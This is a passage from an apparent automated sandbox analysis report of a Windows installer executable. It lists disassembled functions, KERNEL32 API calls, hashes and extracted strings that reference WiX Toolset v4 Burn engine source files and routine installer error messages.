                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009362A8
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 009362B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                            • Opcode ID: e57673257365e14dac64d46e793427a0f45f20e314922e5f74109193d8a4ddd5
                                                                                                                                                                                                                                                                            • Instruction ID: 2c140c87b8acbe354538f807481fd9578890aab7384ca279ddb642262487a6b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e57673257365e14dac64d46e793427a0f45f20e314922e5f74109193d8a4ddd5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851A272600206BFEF215FA0DC86EBB7AADEFC4710F168429FD14D7151EA74DC508AA0
                                                                                                                                                                                                                                                                            Function 008FE01B Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 151COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE17D
                                                                                                                                                                                                                                                                              • Part of subcall function 00945E1B: GetLastError.KERNEL32(?,?,008FE0CE,?,00000003,?,?), ref: 00945E3B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to find expected public key in certificate chain., xrefs: 008FE122
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FE134, 008FE1A1, 008FE1A7, 008FE1BB
                                                                                                                                                                                                                                                                            • Failed to get certificate public key identifier., xrefs: 008FE1AD
                                                                                                                                                                                                                                                                            • Failed to read certificate thumbprint., xrefs: 008FE165
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-112932794
                                                                                                                                                                                                                                                                            • Opcode ID: 4b29b6081806151c9b53f20985729062532206c440cf98052ff7b70187964688
                                                                                                                                                                                                                                                                            • Instruction ID: 318792c42a6a3995940c32ca7e9c55f9be03516be232f4281323045f7c42461a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b29b6081806151c9b53f20985729062532206c440cf98052ff7b70187964688
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02417171A00619AFDB10DEAACC85FAEB7B8FB08715F014125FA04FB291D674EC44CBA5
                                                                                                                                                                                                                                                                            Function 00941A57 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-3295944732
                                                                                                                                                                                                                                                                            • Opcode ID: a30efd8ab642fe5b4f16cf76a3ff3755cce8a8cb00f8ea0d460f9ae8538d324a
                                                                                                                                                                                                                                                                            • Instruction ID: 7b0d462ce59dea5f011633d14756c8b76ba95fb050f1ac95032b29c37a44ea15
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a30efd8ab642fe5b4f16cf76a3ff3755cce8a8cb00f8ea0d460f9ae8538d324a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21F9B1A443107BDB249F5E9CC6F677A9CEB99710F00816AFD0CDF386D2B4C88086A5
                                                                                                                                                                                                                                                                            Function 0094BBF2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000005,00000000,?,00000000,?,?,00947C49,?,00948702,?,00000000,HEAD,00000000,00000000,00948702), ref: 0094BC0A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,?,?,00947C49,?,00948702,?,00000000,HEAD,00000000,00000000,00948702,00000000,?), ref: 0094BC56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to get content length string for internet file handle$Failed to parse size for internet file handle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-1743952032
                                                                                                                                                                                                                                                                            • Opcode ID: 4ef0d7e85e7b4ed61a3efd7bdaa23a3c6cb7da2ae01bbadfb09244c887a8991f
                                                                                                                                                                                                                                                                            • Instruction ID: 10229eeedaeffa7de4fe7d6f5218310b2fed37ff8993292bf2b87f6922535168
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef0d7e85e7b4ed61a3efd7bdaa23a3c6cb7da2ae01bbadfb09244c887a8991f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0011CA73E80234B2DB3161595C4FFAF6968DF46B51F014111BA9CBA1C1EB71CD01E1E1
                                                                                                                                                                                                                                                                            Function 00925051 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00925061
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 009250E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Engine is active, cannot change engine state., xrefs: 00925079
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 0092508B
                                                                                                                                                                                                                                                                            • Failed to set feed download URL., xrefs: 009250BC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Engine is active, cannot change engine state.$Failed to set feed download URL.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-105427012
                                                                                                                                                                                                                                                                            • Opcode ID: 4c8b41c37a1bdebf5d9cebb82016da8c352b7f2007314fc16c2e9b16b9875209
                                                                                                                                                                                                                                                                            • Instruction ID: 09412d1b4a1ec15ca2d4aa304042a8359e10444a1f9235c06ae067e35241e6b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c8b41c37a1bdebf5d9cebb82016da8c352b7f2007314fc16c2e9b16b9875209
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1101A171781A2A77D621A675AC49FA7B65CFB15750F114111F50DEA180E6B0F8008AF2
                                                                                                                                                                                                                                                                            Function 008EA9CE Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008EA9DA
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008EAA62
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get value as version for variable: %ls, xrefs: 008EAA40
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EAA52
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EAA14
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1616145386
                                                                                                                                                                                                                                                                            • Opcode ID: 40a382e7d4007c9aaf864eb3e9bab5bd147a3e75df64bc37f984ad826b951422
                                                                                                                                                                                                                                                                            • Instruction ID: aa07fc350142e8ad421f0c7b60669f98f97619dc526bb92e2dfb3a21d5dbc647
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a382e7d4007c9aaf864eb3e9bab5bd147a3e75df64bc37f984ad826b951422
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701E532981365BFCF219F81CD09F9E3AA5FB16B65F018120FE04EA1A1D771AD10DB95
                                                                                                                                                                                                                                                                            Function 008EA805 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008EA811
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008EA896
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get value as numeric for variable: %ls, xrefs: 008EA874
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA886
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA84B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1964378859
                                                                                                                                                                                                                                                                            • Opcode ID: c0f1ebe4c34c6aa6ac19abd8a7dcc6f4cf6e75382dfb1556f56a9d50b8bc65e4
                                                                                                                                                                                                                                                                            • Instruction ID: 520e0e0874d0beaf3efa2f36abdc7fec8e1ca42f14ab70b85b997c0db1fe0e87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0f1ebe4c34c6aa6ac19abd8a7dcc6f4cf6e75382dfb1556f56a9d50b8bc65e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7101A172A41264BBCF265F85CC0AF9E3A54FB16B65F104130BE18FA1A0D2B5AA119792
                                                                                                                                                                                                                                                                            Function 008E15C8 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E15D8
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • SetDefaultDllDirectories.KERNELBASE ref: 008E15FA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1600
                                                                                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 008E161D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E162B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2226491684-0
                                                                                                                                                                                                                                                                            • Opcode ID: c415a4760820c49f91d4df5ec6b1bc816f68fec514f791ee914fce4ec509ca62
                                                                                                                                                                                                                                                                            • Instruction ID: af53b435fd3037518631f6485552a685b721f82334c9910b5700db7d56988142
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c415a4760820c49f91d4df5ec6b1bc816f68fec514f791ee914fce4ec509ca62
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35018C36611125ABDF216F26DC0DD6E7B79FB92B507194019E815E7120C770A842DBA0
                                                                                                                                                                                                                                                                            Function 008EA941 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,008ED253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,008ED44C,00000001), ref: 008EA94D
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,008ED253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,008ED44C), ref: 008EA9C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA9B1
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA973
                                                                                                                                                                                                                                                                            • Failed to copy value of variable: %ls, xrefs: 008EA99F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3684767681
                                                                                                                                                                                                                                                                            • Opcode ID: 89282624824993bc8c34b749e919b0c5f8a498f3fcbaf2948820f706da11a778
                                                                                                                                                                                                                                                                            • Instruction ID: 5484f3d74b244a0ab14c8aa21e651fcae15e96e105cbf3481b4e01708c38171a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89282624824993bc8c34b749e919b0c5f8a498f3fcbaf2948820f706da11a778
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A01A732681258BBDF11AF55CC0AF9E3F58FF06B65F114010FD14F91A1D6B1AA109B95
                                                                                                                                                                                                                                                                            Function 008FB9E9 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00057AF8,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FB9FC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(E8057400,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA0D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFF71C,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA1E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(BD830005,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA30
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: c2d1a79fe74d531e7e21d0c5222a057d59d4e067feb98a2a58ec720bdc283d6a
                                                                                                                                                                                                                                                                            • Instruction ID: 3f634086dec51e2fd866e346f0a0842225189648af27bf477f504df6584c0aca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d1a79fe74d531e7e21d0c5222a057d59d4e067feb98a2a58ec720bdc283d6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9012534002B14DFC7329F29D808A66BBF0FF51752F004A2DE296929A1C731A994EF92
                                                                                                                                                                                                                                                                            Function 0091E664 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,89504689,000000FF,?,000000FF,008E6DEA,00000000,008E6CF2,008E7162,008E6DEA,008E6EDE,00000000,00000000,008E6CF2,00000000), ref: 0091E6B7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix4\wix4\src\burn\engine\detect.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-3048877371
                                                                                                                                                                                                                                                                            • Opcode ID: 5c159a034cea57a5fe8f6b8027a56486aee3510709d1f50c3bcacd437fa091eb
                                                                                                                                                                                                                                                                            • Instruction ID: 5b44305b72002e4627669cab792110e733e995e932683528b34b7ec35b22bf45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c159a034cea57a5fe8f6b8027a56486aee3510709d1f50c3bcacd437fa091eb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D41B171A00705FFEB219FA88C41FAAB7F9FF08314F104929F665E2191D771A990DB51
                                                                                                                                                                                                                                                                            Function 00900BBA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
